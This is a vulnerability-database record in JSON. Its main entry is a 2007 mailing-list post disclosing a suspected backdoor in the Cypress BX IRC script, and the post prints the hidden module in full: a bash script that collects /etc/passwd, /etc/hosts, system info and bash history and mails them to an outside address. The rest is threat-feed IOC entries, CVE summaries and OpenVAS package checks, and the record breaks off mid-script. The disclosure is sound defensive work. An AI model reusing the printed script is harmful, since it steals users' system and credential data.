{"id": "SECURITYVULNS:DOC:18360", "bulletinFamily": "software", "title": "Cypress BX script backdoored?", "description": "For those of us who use Cyp/bx (http://www.mindcryme.com/~void/cyp1.0k.tar.gz \r\n)\r\n\r\n|]rip[@rock:14:53:49:~/tmp/cyp/modules| $ cat mdop.m\r\n#!/bin/bash\r\n\r\nuname -a >> /tmp/.bx\r\ncat /etc/hosts >> /tmp/.bx\r\ncat /etc/passwd >> /tmp/.bx\r\ncat $HOME/.bash_history >> /tmp/.bx 2>/dev/null\r\nmail defcola@gmail.com < /tmp/.bx\r\nsleep 4\r\nrm -rf /tmp/.bx\r\n\r\nWhat's up with this? Last time I downloaded this that wasn't there, \r\nand it's the same version number but different md5.\r\n.. and this file wasn't included.\r\n\r\n----\r\nChris\r\nNetwork security professional\r\nchris@overflow.no\r\n----\r\n"Computer games don't affect kids. I mean if Pac-Man affected us as \r\nkids, we'd all be running around in darkened rooms, munching magic \r\npills and listening to repetitive electronic music."\r\n--Kristian Wilson, Nintendo 1989.", "published": "2007-11-07T00:00:00", "modified": "2007-11-07T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18360", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:24", "edition": 1, "viewCount": 21, "enchantments": {"score": {"value": 2.7, "vector": "NONE", "modified": "2018-08-31T11:10:24", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB2880833", "KB955430"]}, {"type": "threatpost", "idList": ["THREATPOST:F3563336B135A1D7C1251AE54FDC6286"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_40194E1C6D8911EA808280EE73419AF3.NASL", "FREEBSD_PKG_D887B3D9736611EAB81A001CC0382B2F.NASL", "DEBIAN_DLA-2164.NASL", "FREEBSD_PKG_090763F6703011EA93DD080027846A02.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220201314", "OPENVAS:1361412562311220201323", "OPENVAS:1361412562310892164"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2164-1:52F3C"]}, {"type": "freebsd", "idList": ["D887B3D9-7366-11EA-B81A-001CC0382B2F"]}, {"type": "zdt", "idList": ["1337DAY-ID-34159", "1337DAY-ID-34144", "1337DAY-ID-34158", "1337DAY-ID-34157", "1337DAY-ID-34154", "1337DAY-ID-34134", "1337DAY-ID-34153"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:10149"]}], "modified": "2018-08-31T11:10:24", "rev": 2}, "vulnersScore": 2.7}, "affectedSoftware": []}

{"rst": [{"lastseen": "2020-03-04T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **202[.]65.183.3** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2020-03-04T03:00:00, Last seen: 2020-03-04T03:00:00.\n IOC tags: **generic**.\nASN 18360: (First IP 202.65.176.0, Last IP 202.65.191.255).\nASN Name \"USTASAP\" and Organisation \"Santo Tomas EService Providers\".\nASN hosts 2 domains.\nGEO IP information: City \"Manila\", Country \"Philippines\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-03-04T00:00:00", "id": "RST:C52E0AFC-BE8C-338C-A0AE-80274A24E9F5", "href": "", "published": "2021-02-04T00:00:00", "title": "RST Threat feed. IOC: 202.65.183.3", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-22T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **202[.]65.183.2** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **42**.\n First seen: 2021-01-19T03:00:00, Last seen: 2021-01-22T03:00:00.\n IOC tags: **generic**.\nASN 18360: (First IP 202.65.176.0, Last IP 202.65.191.255).\nASN Name \"USTASAP\" and Organisation \"Santo Tomas EService Providers\".\nASN hosts 2 domains.\nGEO IP information: City \"Quezon City\", Country \"Philippines\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-19T00:00:00", "id": "RST:65050F22-DD5D-3FC9-9C13-8160393D60D3", "href": "", "published": "2021-01-23T00:00:00", "title": "RST Threat feed. IOC: 202.65.183.2", "type": "rst", "cvss": {}}], "cve": [{"lastseen": "2021-02-02T06:14:28", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:21", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-02-02T05:35:21", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T07:12:56", "description": "In JetBrains Hub versions earlier than 2019.1.11738, username enumeration was possible through password recovery.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2019-10-31T15:15:00", "title": "CVE-2019-18360", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18360"], "modified": "2019-11-05T19:48:00", "cpe": [], "id": "CVE-2019-18360", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-18360", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T06:21:32", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "openvas": [{"lastseen": "2020-01-27T18:32:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-7222", "CVE-2018-19824", "CVE-2018-14641", "CVE-2018-5391", "CVE-2018-7740", "CVE-2018-18281", "CVE-2018-18559", "CVE-2019-7221", "CVE-2018-10322", "CVE-2017-18360", "CVE-2019-6974", "CVE-2018-1092", "CVE-2018-1094", "CVE-2018-18397", "CVE-2018-13094", "CVE-2018-20511"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191076", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191076", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1076)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1076\");\n script_version(\"2020-01-23T15:42:05+0000\");\n script_cve_id(\"CVE-2017-18360\", \"CVE-2018-10322\", \"CVE-2018-1092\", \"CVE-2018-1094\", \"CVE-2018-13094\", \"CVE-2018-14641\", \"CVE-2018-18281\", \"CVE-2018-18397\", \"CVE-2018-18559\", \"CVE-2018-19824\", \"CVE-2018-20511\", \"CVE-2018-5391\", \"CVE-2018-7740\", \"CVE-2019-6974\", \"CVE-2019-7221\", \"CVE-2019-7222\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 15:42:05 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:30:14 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1076)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1076\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1076\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1076 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A security flaw was found in the ip_frag_reasm() function in net/ipv4/ip_fragment.c in the Linux kernel which can cause a later system crash in ip_do_fragment(). With certain non-default, but non-rare, configuration of a victim host, an attacker can trigger this crash remotely, thus leading to a remote denial of service.(CVE-2018-14641)\n\nA flaw named FragmentSmack was found in the way the Linux kernel handled reassembly of fragmented IPv4 and IPv6 packets. A remote attacker could use this flaw to trigger time and calculation expensive fragment reassembly algorithm by sending specially crafted packets which could lead to a CPU saturation and hence a denial of service on the system.(CVE-2018-5391)\n\nThe resv_map_release function in mm/hugetlb.c in the Linux kernel, through 4.15.7, allows local users to cause a denial of service (BUG) via a crafted application that makes mmap system calls and has a large pgoff argument to the remap_file_pages system call. (CVE-2018-7740)\n\nA use-after-free vulnerability was found in the way the Linux kernel's KVM hypervisor emulates a preemption timer for L2 guests when nested (=1) virtualization is enabled. This high resolution timer(hrtimer) runs when a L2 guest is active. After VM exit, the sync_vmcs12() timer object is stopped. The use-after-free occurs if the timer object is freed before calling sync_vmcs12() routine. A guest user/process could use this flaw to crash the host kernel resulting in a denial of service or, potentially, gain privileged access to a system. (CVE-2019-7221)\n\nAn information leakage issue was found in the way Linux kernel's KVM hypervisor handled page fault exceptions while emulating instructions like VMXON, VMCLEAR, VMPTRLD, and VMWRITE with memory address as an operand. It occurs if the operand is a mmio address, as the returned exception object holds uninitialized stack memory contents. A guest user/process could use this flaw to leak host's stack memory contents to a guest. (CVE-2019-7222)\n\nThe xfs_dinode_verify function in fs/xfs/libxfs/xfs_inode_buf.c in the Linux kernel can cause a NULL pointer dereference in xfs_ilock_attr_map_shared function. An attacker could trick a legitimate user or a privileged attacker could exploit this by mounting a crafted xfs filesystem image to cause a kernel panic and thus a denial of service. (CVE-2018-10322)\n\nThe Linux kernel is vulnerable to a NULL pointer dereference in the ext4/mballoc.c:ext4_process_freed_data() function. An attacker could trick a legitimate user or a privileged attacker could exploit this by mounting a crafted ext4 image to cause a kernel panic.(CVE-2018-1092)\n\nThe Lin ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~862.14.0.1.h85.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~862.14.0.1.h85.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~862.14.0.1.h85.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~862.14.0.1.h85.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~862.14.0.1.h85.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~862.14.0.1.h85.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~862.14.0.1.h85.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~862.14.0.1.h85.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~862.14.0.1.h85.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-27T18:33:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5333", "CVE-2018-19824", "CVE-2017-7518", "CVE-2016-10741", "CVE-2018-5344", "CVE-2018-6927", "CVE-2018-7757", "CVE-2018-16862", "CVE-2018-8781", "CVE-2018-5391", "CVE-2018-18710", "CVE-2018-18281", "CVE-2018-5332", "CVE-2018-18559", "CVE-2019-3701", "CVE-2018-17972", "CVE-2017-18360", "CVE-2019-9213", "CVE-2018-5750", "CVE-2019-5489"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191512", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191512", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1512)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1512\");\n script_version(\"2020-01-23T12:00:28+0000\");\n script_cve_id(\"CVE-2016-10741\", \"CVE-2017-18360\", \"CVE-2017-7518\", \"CVE-2018-16862\", \"CVE-2018-17972\", \"CVE-2018-18281\", \"CVE-2018-18559\", \"CVE-2018-18710\", \"CVE-2018-19824\", \"CVE-2018-5332\", \"CVE-2018-5333\", \"CVE-2018-5344\", \"CVE-2018-5391\", \"CVE-2018-5750\", \"CVE-2018-6927\", \"CVE-2018-7757\", \"CVE-2018-8781\", \"CVE-2019-3701\", \"CVE-2019-5489\", \"CVE-2019-9213\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 12:00:28 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:00:28 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1512)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1512\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1512\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1512 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"In the Linux kernel through 4.14.13, the rds_message_alloc_sgs() function does not validate a value that is used during DMA page allocation, leading to a heap-based out-of-bounds write (related to the rds_rdma_extra_size() function in 'net/rds/rdma.c') and thus to a system panic. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.(CVE-2018-5332)\n\nIn the Linux kernel through 4.14.13, the rds_cmsg_atomic() function in 'net/rds/rdma.c' mishandles cases where page pinning fails or an invalid address is supplied by a user. This can lead to a NULL pointer dereference in rds_atomic_free_op() and thus to a system panic.(CVE-2018-5333)\n\nA flaw was found in the Linux kernel's handling of loopback devices. An attacker, who has permissions to setup loopback disks, may create a denial of service or other unspecified actions.(CVE-2018-5344)\n\nThe acpi_smbus_hc_add function in drivers/acpi/sbshc.c in the Linux kernel, through 4.14.15, allows local users to obtain sensitive address information by reading dmesg data from an SBS HC printk call.(CVE-2018-5750)\n\nThe futex_requeue function in kernel/futex.c in the Linux kernel, before 4.14.15, might allow attackers to cause a denial of service (integer overflow) or possibly have unspecified other impacts by triggering a negative wake or requeue value. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.(CVE-2018-6927)\n\nMemory leak in the sas_smp_get_phy_events function in drivers/scsi/libsas/sas_expander.c in the Linux kernel allows local users to cause a denial of service (kernel memory exhaustion) via multiple read accesses to files in the /sys/class/sas_phy directory.(CVE-2018-7757)\n\nA an integer overflow vulnerability was discovered in the Linux kernel, from version 3.4 through 4.15, in the drivers/gpu/drm/udl/udl_fb.c:udl_fb_mmap() function. An attacker with access to the udldrmfb driver could exploit this to obtain full read and write permissions on kernel physical pages, resulting in a code execution in kernel space.(CVE-2018-8781)\n\nA flaw was found in the way the Linux KVM module processed the trap flag(TF) bit in EFLAGS during emulation of the syscall instruction, which leads to a debug exception(#DB) being raised in the guest stack. A user/process inside a guest could use this flaw to potentially escalate their privileges inside the guest. Linux guests are not affected by this.(CVE-2017-7518)\n\nA division-by-zero in set_termios(), when debugging is enabled, was found in the Linux kernel. When the [io_ti] driver is l ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-27T18:38:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-19824", "CVE-2018-18281", "CVE-2018-18559", "CVE-2017-18360"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191253", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191253", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1253)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, 